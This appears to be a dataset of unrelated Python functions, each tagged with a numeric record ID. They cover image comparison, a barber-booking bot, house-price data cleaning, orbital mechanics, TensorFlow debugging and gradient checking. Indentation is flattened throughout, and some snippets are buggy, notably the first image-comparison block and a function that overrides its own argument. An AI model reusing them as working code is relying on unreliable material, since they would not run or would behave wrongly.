img1 = Image.open(image_1)
img2 = Image.open(image_2)
# Convert to same mode and size for comparison
img2 = img2.convert(img1.mode)
img2 = img2.resize(img1.size)
sum_sq_diff = np.sum((np.asarray(img1).astype('float') - np.asarray(img2).astype('float'))**2)
    if sum_sq_diff == 0:
        # Images are exactly the same
        pass
else:
normalized_sum_sq_diff = sum_sq_diff / np.sqrt(sum_sq_diff)
assert normalized_sum_sq_diff < 0.001 | 5,334,262 |
def and_sum (phrase):
"""Returns TRUE iff every element in <phrase> is TRUE"""
for x in phrase:
if not x:
return False
return True | 5,334,263 |
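# Behavior sketch: and_sum mirrors the built-in all() for truthiness.
assert and_sum([True, 1, 'x']) == all([True, 1, 'x'])
assert and_sum([True, 0]) == all([True, 0])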
def history_menu(chatid, message_id=False):
"""
    Display the order history.
    :param chatid: id of the user to send the history to
    :param message_id: if given, edit the existing message with this id;
        otherwise send the history as a new message
:return:
"""
menu = types.InlineKeyboardMarkup()
menu.add(types.InlineKeyboardButton(text="К главному меню", callback_data='to_main_menu'))
history_list = History(chatid)
history_list_message = ""
if len(history_list) != 0:
for barberName, order_time, rating in history_list:
history_list_message += "Барбер: " + str(barberName) + ", время: " + str(order_time) + ", оценка: " \
+ str(rating) + "\n"
else:
history_list_message = "У вас еще не было стрижек"
if not message_id:
send_message(chatid, history_list_message, menu)
else:
edit_message(chatid, message_id, history_list_message, menu, markdown=True) | 5,334,264 |
def load_data(filename: str):
"""
    Load house prices dataset and preprocess data.
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (prices) - either as a single
DataFrame or a Tuple[DataFrame, Series]
"""
house_data = pd.read_csv(filename)
# drop corrupted data
house_data.dropna(inplace=True)
house_data.drop_duplicates(inplace=True)
# remove the location and id columns
house_data.drop(columns=['lat', 'long', 'id'], inplace=True)
# remove negative and illegal values
for column in ['price', 'sqft_lot', 'sqft_lot15', 'floors', 'yr_built']:
house_data = house_data[house_data[column] > 0]
for column in [('waterfront', range(2)), ('view', range(5)),
('condition', range(1, 6)), ('grade', range(1, 14))]:
house_data = house_data[house_data[column[0]].isin(column[1])]
# categorize the columns 'zipcode', 'date', 'yr_built', 'yr_renovated'
house_data['zipcode'] = house_data['zipcode'].astype(str).str[:3]
house_data = pd.get_dummies(house_data, columns=['zipcode'],
prefix='zipcode_area')
house_data['date'] = house_data['date'].str[:4]
house_data = pd.get_dummies(house_data, columns=['date'])
house_data['yr_built'] = house_data['yr_built'].astype(str).str[:2]
house_data = pd.get_dummies(house_data, columns=['yr_built'])
house_data['yr_renovated'] = house_data['yr_renovated'].astype(str).str[:2]
house_data = pd.get_dummies(house_data, columns=['yr_renovated'])
# is_basement flag
house_data['is_basement'] = (house_data['sqft_basement'] >= 1).astype(int)
return house_data['price'], house_data.drop(columns=['price']) | 5,334,265 |
def eccanom(M, e):
"""Finds eccentric anomaly from mean anomaly and eccentricity
This method uses algorithm 2 from Vallado to find the eccentric anomaly
from mean anomaly and eccentricity.
Args:
M (float or ndarray):
mean anomaly
e (float or ndarray):
            eccentricity (may be a scalar if M is given as an array, but
            otherwise must match the size of M)
Returns:
E (float or ndarray):
eccentric anomaly
"""
# make sure M and e are of the correct format.
# if 1 value provided for e, array must match size of M
M = np.array(M).astype(float)
if not M.shape:
M = np.array([M])
e = np.array(e).astype(float)
if not e.shape:
e = np.array([e] * len(M))
assert e.shape == M.shape, "Incompatible inputs."
assert np.all((e >= 0) & (e < 1)), "e defined outside [0,1)"
# initial values for E
E = M / (1 - e)
mask = e * E ** 2 > 6 * (1 - e)
E[mask] = (6 * M[mask] / e[mask]) ** (1. / 3)
# Newton-Raphson setup
tolerance = np.finfo(float).eps * 4.01
numIter = 0
maxIter = 200
err = 1.
while err > tolerance and numIter < maxIter:
E = E - (M - E + e * np.sin(E)) / (e * np.cos(E) - 1)
err = np.max(abs(M - (E - e * np.sin(E))))
numIter += 1
if numIter == maxIter:
raise Exception("eccanom failed to converge. Final error of %e" % err)
return E | 5,334,266 |
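# Usage sketch: solve Kepler's equation M = E - e*sin(E) for a grid of
# mean anomalies and verify the residual is at machine precision.
import numpy as np
M = np.linspace(0.1, 2 * np.pi - 0.1, 5)
E = eccanom(M, 0.3)
assert np.allclose(M, E - 0.3 * np.sin(E))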
def transform_frame(frame: np.array,
transform: AffineTransformation,
rotate: bool = False,
center_crop: bool = False) -> np.array:
""" Perform affine transformation of a single image-frame.
Parameters
----------
frame : array
Image frame.
transform : AffineTransformation
Delta-x, -y, -angle to use for transformation.
rotate : bool
If True, rotation will be used otherwise only translation.
center_crop : bool
If True, the center of the image will be cropped out by a fixed margin to remove border artifacts.
Returns
-------
array
"""
dx, dy, da = transform
height, width = frame.shape[:2]
# Reconstruct transformation matrix accordingly to new values
transformation_matrix = np.zeros((2, 3), np.float32)
if rotate:
transformation_matrix[0, 0] = np.cos(da)
transformation_matrix[0, 1] = -np.sin(da)
transformation_matrix[1, 0] = np.sin(da)
transformation_matrix[1, 1] = np.cos(da)
else:
transformation_matrix[0, 0] = 1
transformation_matrix[0, 1] = 0
transformation_matrix[1, 0] = 0
transformation_matrix[1, 1] = 1
transformation_matrix[0, 2] = dx
transformation_matrix[1, 2] = dy
    # Apply the affine warp to the given frame
stabilized_frame = cv2.warpAffine(frame, transformation_matrix, (width, height), flags=cv2.INTER_NEAREST)
if center_crop:
stabilized_frame = _scale_around_center(stabilized_frame)
return stabilized_frame | 5,334,267 |
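# Minimal check (sketch, requires OpenCV installed): a zero translation and
# rotation leaves the frame unchanged under the nearest-neighbour warp.
import numpy as np
frame = np.arange(16, dtype=np.uint8).reshape(4, 4)
out = transform_frame(frame, (0.0, 0.0, 0.0))
assert (out == frame).all()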
def _check_nvidia_driver_version(args):
"""If --nvidia-driver-version is set, warn that it is ignored."""
if args.nvidia_driver_version:
print('***WARNING: The --nvidia-driver-version flag is deprecated and will '
'be ignored.') | 5,334,268 |
def run_check(cmd: typing.Sequence[typing.Union[os.PathLike, str]], *,
input_lines: typing.Optional[BytesOrStrIterator] = ...,
encoding: typing.Optional[str] = ...,
capture_output: bool = ...,
quiet: bool = ...,
**kwargs) -> subprocess.CompletedProcess:
"""Accept bytes or string input_lines depending on ``encoding``.""" | 5,334,269 |
def TEMA(equity, start=None, end=None, timeperiod=30):
"""Triple Exponential Moving Average
    :param timeperiod: number of periods for the moving average
    :return: array of TEMA values
"""
close = np.array(equity.hp.loc[start:end, 'close'], dtype='f8')
real = talib.TEMA(close, timeperiod=timeperiod)
return real | 5,334,270 |
def get_miner_pool_by_owner_id():
"""
    Storage provider details.
:return:
"""
owner_id = request.form.get("owner_id")
data = MinerService.get_miner_pool_by_no(owner_id)
return response_json(data) | 5,334,271 |
def notFound(e):
"""View for 404 page."""
return render_template('content/notfound.jinja.html'), 404 | 5,334,272 |
def watch_graph_with_blacklists(run_options,
graph,
debug_ops="DebugIdentity",
debug_urls=None,
node_name_regex_blacklist=None,
op_type_regex_blacklist=None):
"""Add debug tensor watch options, blacklisting nodes and op types.
This is similar to watch_graph(), but the node names and op types can be
blacklisted, instead of whitelisted.
Args:
run_options: An instance of tensorflow.core.protobuf.config_pb2.RunOptions
graph: An instance of tensorflow.python.framework.ops.Graph
debug_ops: Name of the debug op to use. Default: "DebugIdentity".
      Can be a list of strings or a single string. The latter case is
equivalent to a list of a single string.
debug_urls: Debug urls. Can be a list of strings, a single string, or
      None. The case of a single string is equivalent to a list consisting
of a single string.
node_name_regex_blacklist: Regular-expression blacklist for node_name.
This should be a string, e.g., "(weight_[0-9]+|bias_.*)"
op_type_regex_blacklist: Regular-expression blacklist for the op type of
nodes. If both node_name_regex_blacklist and op_type_regex_blacklist
      are set, the two filtering operations will occur in an "OR"
relation. In other words, a node will be excluded if it hits either of
the two blacklists; a node will be included if and only if it hits
none of the blacklists. This should be a string, e.g.,
"(Variable|Add)".
"""
if isinstance(debug_ops, str):
debug_ops = [debug_ops]
if node_name_regex_blacklist:
node_name_pattern = re.compile(node_name_regex_blacklist)
else:
node_name_pattern = None
if op_type_regex_blacklist:
op_type_pattern = re.compile(op_type_regex_blacklist)
else:
op_type_pattern = None
ops = graph.get_operations()
for op in ops:
# Skip nodes without any output tensors.
if not op.outputs:
continue
node_name = op.name
op_type = op.type
if node_name_pattern and node_name_pattern.match(node_name):
continue
if op_type_pattern and op_type_pattern.match(op_type):
continue
for slot in xrange(len(op.outputs)):
add_debug_tensor_watch(
run_options,
node_name,
output_slot=slot,
debug_ops=debug_ops,
debug_urls=debug_urls) | 5,334,273 |
def get_stay(admission_date, exit_date):
"""Method to get exit date."""
try:
if not exit_date:
exit_date = datetime.now().date()
no_days = exit_date - admission_date
        # Break the stay down into years, months and days
years = ((no_days.total_seconds()) / (365.242 * 24 * 3600))
years_int = int(years)
months = (years - years_int) * 12
months_int = int(months)
days = (months - months_int) * (365.242 / 12)
days_int = int(days)
years_val = '' if years_int == 0 else '%s years ' % (years_int)
mon_check = years_int > 0 and months_int > 0
months_val = '%s months ' % (months_int) if mon_check else ''
pds = '%s%s%s days' % (years_val, months_val, days_int)
except Exception as e:
print('Error calculating exit - %s' % str(e))
return None
else:
return pds | 5,334,274 |
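# Usage sketch: length of stay computed with the function's approximate
# calendar arithmetic (365.242-day years).
from datetime import date
print(get_stay(date(2020, 1, 1), date(2021, 3, 5)))  # -> '1 years 2 months 2 days'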
def compress(X, halve, g = 0, indices = None):
"""Returns Compress coreset of size 2^g sqrt(n) or, if indices is not None,
of size 2^g sqrt(len(indices)) as row indices into X
Args:
X: Input sequence of sample points with shape (n, d)
        halve: Algorithm that takes as input a set of points and returns the
            indices of a subset of points with cardinality half of the input set
g: Oversampling parameter, a nonnegative integer
indices: If None, compresses X and returns coreset of size 2^g sqrt(n);
otherwise, compresses X[indices] and returns coreset of size
2^g sqrt(len(indices))
"""
# Check if indices is None in which case it sets it to range(size(X))
if indices is None:
indices = np.arange(X.shape[0], dtype=int)
# If the number of input points matches the target coreset size, we're done
if len(indices) == 4**g:
return indices
else:
# Partition the set input indices into four disjoint sets
partition_set = np.array_split(indices,4)
# Initialize an array to hold outputs of recursive calls
compress_outputs = []
for x in partition_set:
# Recursively call compress on the four subsets and
# add its output to the list
compress_output = compress(X, halve, g, indices = x)
compress_outputs.append(compress_output)
# Merge outputs of the recursive calls to compress
combined_compress_output = np.concatenate(compress_outputs)
# Run halving on the combined output
indices_into_combined = halve(X[combined_compress_output])
# Return indices into the original input set X
return combined_compress_output[indices_into_combined] | 5,334,275 |
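# Sketch with a naive halving rule (keep every other point); a real use
# would pass a kernel-thinning halve here.
import numpy as np
def naive_halve(points):
    return np.arange(0, points.shape[0], 2)
X = np.random.default_rng(0).normal(size=(64, 2))
coreset = compress(X, naive_halve, g=0)
assert len(coreset) == 8  # 2**g * sqrt(n) = 1 * sqrt(64)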
def filter_objects(objs, labels, none_val=0):
"""Keep objects specified by label list"""
out = objs.copy()
all_labels = set(nonzero_unique(out))
labels = set(labels)
remove_labels = all_labels - labels
for l in remove_labels:
remove_object(out, l)
return out | 5,334,276 |
def print_rule(rule,counter):
""" Helper function to print a rule """
print ("------------------------------------------------")
print (" NORM Number={}".format(str(counter)))
print ("------------------------------------------------")
if rule[0]=="Per":
print (" > PERMITTED to "+rule[1][2][1].upper())
print (" "+rule[2][1][1].upper()+"-"+rule[2][2][1].upper()+'s in ZONE-'+rule[1][1][1])
elif rule[0]=="Pro":
print (" > PROHIBITED to "+rule[1][2][1].upper())
print (" "+rule[2][1][1].upper()+"-"+rule[2][2][1].upper()+'s in ZONE-'+rule[1][1][1])
else:
print (" > OBLIGATORY to")
print (" "+rule[2][1][1].upper()+" "+rule[1][1][1][1].upper()+"-"+rule[1][1][2][1].upper()+'s in ZONE-'+rule[2][2][1])
print (" if you "+rule[1][2][1].upper()+" "+rule[1][1][1][1].upper()+"-"+rule[1][1][2][1].upper()+'s') | 5,334,277 |
def test_restarting_completed_job(spark_client, feature_table):
""" Job has succesfully finished on previous try """
job = SimpleStreamingIngestionJob(
"", "default", feature_table, SparkJobStatus.COMPLETED
)
spark_client.feature_store.list_feature_tables.return_value = [feature_table]
spark_client.list_jobs.return_value = [job]
ensure_stream_ingestion_jobs(spark_client, all_projects=True)
assert spark_client.start_stream_to_online_ingestion.call_count == 2 | 5,334,278 |
def get_index_freq(freqs, fmin, fmax):
"""Get the indices of the freq between fmin and fmax in freqs
"""
f_index_min, f_index_max = -1, 0
for freq in freqs:
if freq <= fmin:
f_index_min += 1
if freq <= fmax:
f_index_max += 1
# Just check if f_index_max is not out of bound
f_index_max = min(len(freqs) - 1, f_index_max)
f_index_min = max(0, f_index_min)
return f_index_min, f_index_max | 5,334,279 |
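# Behavior sketch: f_index_min is the last index with freq <= fmin, and
# f_index_max is the first index past fmax (clamped to the array bounds).
freqs = [1.0, 2.0, 3.0, 4.0, 5.0]
assert get_index_freq(freqs, 2.0, 4.0) == (1, 4)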
def get_gene_mod(gene_id, marker_id):
"""Retrieves a GeneMod model if the gene / marker pair already exists,
or creates a new one
"""
if gene_id in ("None", None):
gene_id = 0
if marker_id in ("None", None):
marker_id = 0
gene_mod = GeneMod.query.filter_by(gene_id=gene_id, marker_id=marker_id).first()
if gene_mod:
log.info("Found gene_mod for gene %s and marker %s", gene_id, marker_id)
return gene_mod
gene = Gene.get_by_id(gene_id)
marker = Marker.get_by_id(marker_id)
if not (gene or marker):
return None
gene_label = gene.label if gene else ""
gene_id = gene.bioportal_id if gene else ""
marker_label = marker.label if marker else ""
marker_id = marker.bioportal_id if marker else ""
user_id = gene.user_id if gene else marker.user_id
group_id = gene.group_id if gene else marker.group_id
label = f"{gene_label}-{marker_label}"
bioportal_id = f"{gene_id}-{marker_id}"
gene_mod = GeneMod(
label=label,
bioportal_id=bioportal_id,
user_id=user_id,
group_id=group_id,
)
if gene:
gene_mod.update(gene=gene, gene_id=gene_id, commit=False)
if marker:
gene_mod.update(marker=marker, marker_id=marker_id, commit=False)
gene_mod.save()
return gene_mod | 5,334,280 |
def random_matrix(shape, tt_rank=2, mean=0., stddev=1.,
dtype=tf.float32, name='t3f_random_matrix'):
"""Generate a random TT-matrix of the given shape with given mean and stddev.
Entries of the generated matrix (in the full format) will be iid and satisfy
E[x_{i1i2..id}] = mean, Var[x_{i1i2..id}] = stddev^2, but the distribution is
in fact not Gaussian.
In the current implementation only mean 0 is supported. To get
a random_matrix with specified mean but tt_rank greater by 1 you can call
x = t3f.random_matrix(shape, tt_rank, stddev=stddev)
x = mean * t3f.ones_like(x) + x
Args:
shape: 2d array, shape[0] is the shape of the matrix row-index,
shape[1] is the shape of the column index.
shape[0] and shape[1] should have the same number of elements (d)
Also supports omitting one of the dimensions for vectors, e.g.
random_matrix([[2, 2, 2], None])
and
random_matrix([None, [2, 2, 2]])
will create an 8-element column and row vectors correspondingly.
tt_rank: a number or a (d+1)-element array with ranks.
mean: a number, the desired mean for the distribution of entries.
stddev: a number, the desired standard deviation for the distribution of
entries.
dtype: [tf.float32] dtype of the resulting matrix.
name: string, name of the Op.
Returns:
TensorTrain containing a TT-matrix of size
np.prod(shape[0]) x np.prod(shape[1])
"""
# TODO: good distribution to init training.
# In case the shape is immutable.
shape = list(shape)
# In case shape represents a vector, e.g. [None, [2, 2, 2]]
if shape[0] is None:
shape[0] = np.ones(len(shape[1]), dtype=int)
# In case shape represents a vector, e.g. [[2, 2, 2], None]
if shape[1] is None:
shape[1] = np.ones(len(shape[0]), dtype=int)
shape = np.array(shape)
tt_rank = np.array(tt_rank)
_validate_input_parameters(is_tensor=False, shape=shape, tt_rank=tt_rank)
num_dims = shape[0].size
if tt_rank.size == 1:
tt_rank = tt_rank * np.ones(num_dims - 1)
tt_rank = np.concatenate([[1], tt_rank, [1]])
tt_rank = tt_rank.astype(int)
var = np.prod(tt_rank)
# Empirically entries of a TT tensor with cores initialized from N(0, 1)
# will have variances np.prod(tt_rank) and mean 0.
# We scale each TT-core to obtain the desired stddev
cr_exponent = -1.0 / (2 * num_dims)
var = np.prod(tt_rank ** cr_exponent)
core_stddev = stddev ** (1.0 / num_dims) * var
with tf.name_scope(name):
tt = matrix_with_random_cores(shape, tt_rank=tt_rank, stddev=core_stddev,
dtype=dtype)
if np.abs(mean) < 1e-8:
return tt
else:
raise NotImplementedError('non-zero mean is not supported yet') | 5,334,281 |
def set_dict_defaults_inplace(dct, *args):
"""
Modifies a dictionary in-place by populating key/value pairs present in the
default dictionaries which have no key in original dictionary `dct`. Useful
for passing along keyword argument dictionaries between functions.
Parameters
----------
dct: dict
*args: dictionaries
Returns
-------
dct: (possibly modified) input dictionary
Examples
--------
>>> d = {1: None}
>>> set_dict_defaults_inplace(d, {2: []})
>>> d == {1: None, 2: []}
True
>>> f = {'a': 1, 'b': 3}
>>> g = {'a': 1}
>>> set_dict_defaults_inplace(g, {'b': 2, 'a': 7}, {'b': 3})
>>> f == g
True
>>> h = {42: True, 'b': 3}
>>> i = {}
>>> set_dict_defaults_inplace(i, {42: True, 'b': 2}, {'b': 3})
>>> h == i
True
"""
ori_dct_keys = dct.keys()
new_dct = {}
for defaults in args:
for k, v in defaults.items():
if k not in ori_dct_keys:
new_dct[k] = v
dct.update(new_dct) | 5,334,282 |
def triangulate_polylines(polylines, holePts, lowQuality = False, maxArea = 0.01):
"""
Convenience function for triangulating a polygonal region using the `triangle` library.
Parameters
----------
polylines
List of point lists, each defining a closed polygon (with coinciding
first and last points) to triangulate.
holePts
A single point within each polygonal region that should be interpreted
as a hole. These regions will be omitted from the output triangulation.
lowQuality
Prohibit the insertion of any Steiner points, creating a low-quality
        triangulation that can be used for traversal/topological queries.
maxArea
Area threshold for refining triangles; ignored if lowQuality is True.
Returns
-------
V, F
Indexed face set representation of the output triangle mesh.
"""
lV, lE = mesh_operations.mergedMesh([mesh_operations.polylineToLineMesh(p) for p in polylines])
omitQualityFlag, flags = False, ""
if lowQuality: omitQualityFlag, flags = True, "YYS0"
V, F, markers = triangulation.triangulate(lV, lE, holePts=holePts, triArea=maxArea, omitQualityFlag=omitQualityFlag, flags=flags)
return V, F | 5,334,283 |
def inclination(x, y, z, u, v, w):
"""Compute value of inclination, I.
Args:
x (float): x-component of position
y (float): y-component of position
z (float): z-component of position
u (float): x-component of velocity
v (float): y-component of velocity
w (float): z-component of velocity
Returns:
float: inclination, I
"""
my_hz = x*v-y*u
my_h = np.sqrt( (y*w-z*v)**2 + (z*u-x*w)**2 + (x*v-y*u)**2 )
return np.arccos(my_hz/my_h) | 5,334,284 |
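# Sanity checks (sketch): an equatorial circular orbit has I = 0 while a
# polar orbit has I = pi/2 (position/velocity in arbitrary consistent units).
import numpy as np
assert np.isclose(inclination(1, 0, 0, 0, 1, 0), 0.0)
assert np.isclose(inclination(1, 0, 0, 0, 0, 1), np.pi / 2)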
def test_ConstantsValues():
"""Test :mod:`~utilipy.constants.values.ConstantsValues`."""
# ----------------------------
# Frozen
f = values.ConstantsValues(frozen=True)
assert f.from_frozen is True
_names = set(data.__all_constants__)
_names.update({"c_ms", "c_kms", "AU_to_pc", "pc_to_AU"})
assert f._names == _names
# standard constants
C = frozenconstants
for name in data.__all_constants__:
assert getattr(f, name) == C[name].value
# __getitem__
assert f[name] == C[name].value
# ----------------------------
# Not Frozen
# TODO
return | 5,334,285 |
def tile_bbox(bbox, grid_width):
"""
Tile bbox into multiple sub-boxes, each of `grid_width` size.
>>> list(tile_bbox((-1, 1, 0.49, 1.51), 0.5)) #doctest: +NORMALIZE_WHITESPACE
[(-1.0, 1.0, -0.5, 1.5),
(-1.0, 1.5, -0.5, 2.0),
(-0.5, 1.0, 0.0, 1.5),
(-0.5, 1.5, 0.0, 2.0),
(0.0, 1.0, 0.5, 1.5),
(0.0, 1.5, 0.5, 2.0)]
"""
min_x = math.floor(bbox[0]/grid_width) * grid_width
min_y = math.floor(bbox[1]/grid_width) * grid_width
max_x = math.ceil(bbox[2]/grid_width) * grid_width
max_y = math.ceil(bbox[3]/grid_width) * grid_width
x_steps = math.ceil((max_x - min_x) / grid_width)
y_steps = math.ceil((max_y - min_y) / grid_width)
for x in xrange(int(x_steps)):
for y in xrange(int(y_steps)):
yield (
min_x + x * grid_width,
min_y + y * grid_width,
min_x + (x + 1) * grid_width,
min_y + (y + 1)* grid_width,
) | 5,334,286 |
def OctahedralGraph():
"""
Return an Octahedral graph (with 6 nodes).
The regular octahedron is an 8-sided polyhedron with triangular faces. The
octahedral graph corresponds to the connectivity of the vertices of the
    octahedron. It is the line graph of the tetrahedral graph. The octahedral
    graph is symmetric, so the spring-layout algorithm will be very effective for
display.
PLOTTING: The Octahedral graph should be viewed in 3 dimensions. We choose
to use a planar embedding of the graph. We hope to add rotatable,
    3-dimensional viewing in the future. In such a case, an argument will be
added to select the desired layout.
EXAMPLES:
Construct and show an Octahedral graph::
sage: g = graphs.OctahedralGraph()
sage: g.show() # long time
Create several octahedral graphs in a Sage graphics array They will be drawn
differently due to the use of the spring-layout algorithm::
sage: g = []
sage: j = []
sage: for i in range(9):
....: k = graphs.OctahedralGraph()
....: g.append(k)
sage: for i in range(3):
....: n = []
....: for m in range(3):
....: n.append(g[3*i + m].plot(vertex_size=50, vertex_labels=False))
....: j.append(n)
sage: G = graphics_array(j)
sage: G.show() # long time
"""
adj = {0: [1, 2, 3, 4], 1: [2, 3, 5], 2: [4, 5], 3: [4, 5], 4: [5]}
G = Graph(adj, format='dict_of_lists', name="Octahedron")
G._circle_embedding([0, 1, 2], radius=5, angle=pi/2)
G._circle_embedding([4, 3, 5], radius=1, angle=pi/6)
return G | 5,334,287 |
def peak_detect(y, delta, x=None):
""" Find local maxima in y.
Args:
y (array): intensity data in which to look for peaks
delta (float): a point is considered a maximum peak if it has the maximal value, and was preceded (to the left) by a value lower by DELTA.
x (array, optional): correspond x-axis
Returns:
tuple containing:
- *array*: indices of peaks / the x-values of peaks if x arg was passed
- *array* : y values of peaks
References:
Converted from MATLAB script at http://billauer.co.il/peakdet.html.
"""
maxtab = []
mintab = []
if x is None:
x = np.arange(len(y))
y = np.asarray(y)
mn, mx = np.Inf, -np.Inf
mnpos, mxpos = np.NaN, np.NaN
lookformax = True
for i in np.arange(len(y)):
this = y[i]
if this > mx:
mx = this
mxpos = x[i]
if this < mn:
mn = this
mnpos = x[i]
if lookformax:
if this < mx - delta:
maxtab.append((mxpos, mx))
mn = this
mnpos = x[i]
lookformax = False
else:
if this > mn + delta:
mintab.append((mnpos, mn))
mx = this
mxpos = x[i]
lookformax = True
return np.array(maxtab) | 5,334,288 |
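# Usage sketch: sin(x) on [0, 4*pi] has two maxima (near pi/2 and 5*pi/2).
import numpy as np
x = np.linspace(0, 4 * np.pi, 200)
peaks = peak_detect(np.sin(x), delta=0.5, x=x)
assert peaks.shape == (2, 2)  # rows of (x-position, peak value)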
def quadruplet_fixated_egomotion( filename ):
"""
Given a filename that contains 4 different point-view combos, parse the filename
and return the pair-wise camera pose.
Parameters:
-----------
filename: a filename in the specific format.
Returns:
-----------
egomotion: a numpy array of length 36 (6x6).
        (a concatenation of six 6-DOF relative camera pose vectors)
"""
if isinstance(filename, list):
raise ValueError("Having more than two inputs to a fixated camera pose problem")
full_paths = parse_fixated_filename(filename)
if len(full_paths) != 4 :
raise ValueError("quadruplet first view prediction with list shorter than 4")
# perm = random.shuffle(range(4))
# full_paths = [full_paths[i] for i in perm]
poses = []
for i in range(3):
for j in range(i+1, 4):
pose = calculate_relative_camera_pose(full_paths[i], full_paths[j])
poses.append(pose)
poses = np.hstack(poses)
return poses | 5,334,289 |
def test_filter_log_entries_incomplete_entries():
"""
Checks if filter removes incomplete entries.
"""
filter_instance = _create_log_filter()
entries = [
{
'some_field': 'value0',
'filtered_field': 'no filter0',
'additional_field': ''
},
{
'some_field': '',
'filtered_field': 'no filter1'
},
{
'filtered_field': 'no filter2'
}
]
expected_entries = copy.deepcopy(entries[:1])
filter_instance.filter_log_entries(entries)
assert entries == expected_entries | 5,334,290 |
def moshinsky(state1,state2,stater,statec,state,type):
"""
    Calculates the Moshinsky coefficients used to transform between the
    two-particle and relative/center-of-mass frames.
    w1 x w2 -> w
    wr x wc -> w
    type can be either "SU3" or "SO3".
    If type == "SU3", state1, state2, stater, statec and state are simply
    SU3State instances.
    If type == "SO3", state1 etc. are (n1, L1) where N1 = 2*n1 + L1 and
    w1 = SU3State(N1, 0); state = L.
"""
mosh=0
if type=="SU3":
#check SU3 coupling
if u3.mult(state1,state2,state)*u3.mult(stater,statec,state)!=0:
mosh=mosh_SU3(state1,state2,stater,statec,state)
if type=="SO3":
#check that angular momentum coupling is allowed and that N1+N2=Nr+Nc
(n1,L1)=state1
(n2,L2)=state2
(nr,Lr)=stater
(nc,Lc)=statec
L=state
if (so3.mult(L1,L2,L)!=0) and (so3.mult(Lc,Lr,L)!=0) and ((2*n1+L1+2*n2+L2)==(2*nr+Lr+2*nc+Lc)):
mosh=mosh_SO3((n1,L1),(n2,L2),(nr,Lr),(nc,Lc),L)
return mosh | 5,334,291 |
def test_lie_algebra_nqubits_check():
"""Test that we warn if the system is too big."""
@qml.qnode(qml.device("default.qubit", wires=5))
def circuit():
qml.RY(0.5, wires=0)
return qml.expval(qml.Hamiltonian(coeffs=[-1.0], observables=[qml.PauliX(0)]))
with pytest.warns(UserWarning, match="The exact Riemannian gradient is exponentially"):
LieAlgebraOptimizer(circuit=circuit, stepsize=0.001) | 5,334,292 |
def _write_k_file(output_k, causal_snp_number):
"""
    Writes the causal SNP K file: a single line of equal thresholds,
    one per causal SNP.
    """
    # NOTE: the causal_snp_number argument is overridden below, so three
    # equal thresholds (1/3 each) are always written.
causal_snp_number = 3
threshold = 1.0/(causal_snp_number)
thresh_list = [threshold] * causal_snp_number
thresh_list = [str(o) for o in thresh_list]
with open(output_k, 'w') as out:
out.write(" ".join(thresh_list) + "\n") | 5,334,293 |
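# Usage sketch: note that the causal_snp_number argument is currently
# overridden inside the function, so three equal thresholds are written.
import os, tempfile
path = os.path.join(tempfile.mkdtemp(), 'k_file.txt')
_write_k_file(path, causal_snp_number=5)
with open(path) as fh:
    print(fh.read())  # -> '0.3333333333333333 0.3333333333333333 0.3333333333333333'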
def get_elastic_apartments_not_for_sale():
"""
Get apartments not for sale but with published flags
"""
s_obj = (
ApartmentDocument.search()
.filter("term", publish_on_oikotie=True)
.filter("term", publish_on_etuovi=True)
.filter("term", apartment_state_of_sale__keyword=ApartmentStateOfSale.RESERVED)
)
s_obj.execute()
scan = s_obj.scan()
uuids = []
for hit in scan:
uuids.append(hit.uuid)
return uuids | 5,334,294 |
def promptYesNoCancel(prompt, prefix=''):
"""Simple Yes/No/Cancel prompt
:param prompt: string, message to the user for selecting a menu entry
:param prefix: string, text to print before the menu entry to format the display
:returns: string, menu entry text
"""
menu = [
{'index': 1, 'text': 'Yes', 'type': 'YES'},
{'index': 2, 'text': 'No', 'type': 'NO'},
{'index': 3, 'text': 'Cancel', 'type': 'EXIT'}
]
return promptSimple(menu, prompt, prefix) | 5,334,295 |
def gradcheck_naive(f, x):
"""
    Implements a manual gradient check: this function is used as a helper in many places
- f should be a function that takes a single argument and outputs the cost and its gradients
- x is the point (numpy array) to check the gradient at
"""
rndstate = random.getstate()
random.setstate(rndstate)
fx, grad = f(x) # Evaluate function value at original point
h = 1e-4
# Iterate over all indexes in x
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# modifying x[ix] with h defined above to compute numerical gradients
# make sure you call random.setstate(rndstate) before calling f(x) each time, this will make it
# possible to test cost functions with built in randomness later
oldvalue = x[ix]
x[ix] = oldvalue + h
random.setstate(rndstate)
fxh, _ = f(x)
x[ix] = oldvalue - h
random.setstate(rndstate)
fxnh, _ = f(x)
numgrad = ((fxh - fxnh) / 2.0) / h
x[ix] = oldvalue
# Compare gradients
reldiff = abs(numgrad - grad[ix]) / max(1, abs(numgrad), abs(grad[ix]))
if reldiff > 1e-5:
print "Gradient check failed."
print "First gradient error found at index %s" % str(ix)
print "Your gradient: %f \t Numerical gradient: %f" % (grad[ix], numgrad)
return False
it.iternext() # Step to next dimension
print "Gradient check passed!"
return True | 5,334,296 |
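# Usage sketch (Python 2, matching the print statements above): check the
# gradient of f(x) = sum(x**2), whose analytic gradient is 2*x.
import numpy as np
quad = lambda x: (np.sum(x ** 2), 2 * x)
gradcheck_naive(quad, np.array([1.5, -0.3, 2.0]))  # prints "Gradient check passed!"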
def cal_mae_loss(logits, gts, reduction):
"""
    :param logits: (N,C,H,W) logits predicted by the model.
:param gts: (N,1,H,W) ground truths.
:param reduction: specifies how all element-level loss is handled.
:return: mae loss
"""
probs = logits.sigmoid()
loss = (probs - gts).abs()
return reduce_loss(loss, reduction) | 5,334,297 |
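# Sketch assuming a minimal mmcv-style reduce_loss helper, defined here only
# to make the example self-contained.
import torch
def reduce_loss(loss, reduction):
    return {'none': loss, 'mean': loss.mean(), 'sum': loss.sum()}[reduction]
logits = torch.zeros(1, 1, 2, 2)   # sigmoid(0) = 0.5 everywhere
gts = torch.ones(1, 1, 2, 2)
assert cal_mae_loss(logits, gts, 'mean').item() == 0.5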
def runserver():
"""Run CRIPTs using the built-in runserver."""
with cd(APP_ROOT):
run("python manage.py runserver 0.0.0.0:8080") | 5,334,298 |
def divideByFirstColumn(matrix):
"""This function devide a matrix by its first column to resolve
wrong intemsity problems"""
result = (matrix.T / matrix.sum(axis=1)).T
return result | 5,334,299 |
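# Behavior sketch: despite the name, each row is divided by its row sum.
import numpy as np
m = np.array([[1.0, 3.0], [2.0, 2.0]])
assert np.allclose(divideByFirstColumn(m), [[0.25, 0.75], [0.5, 0.5]])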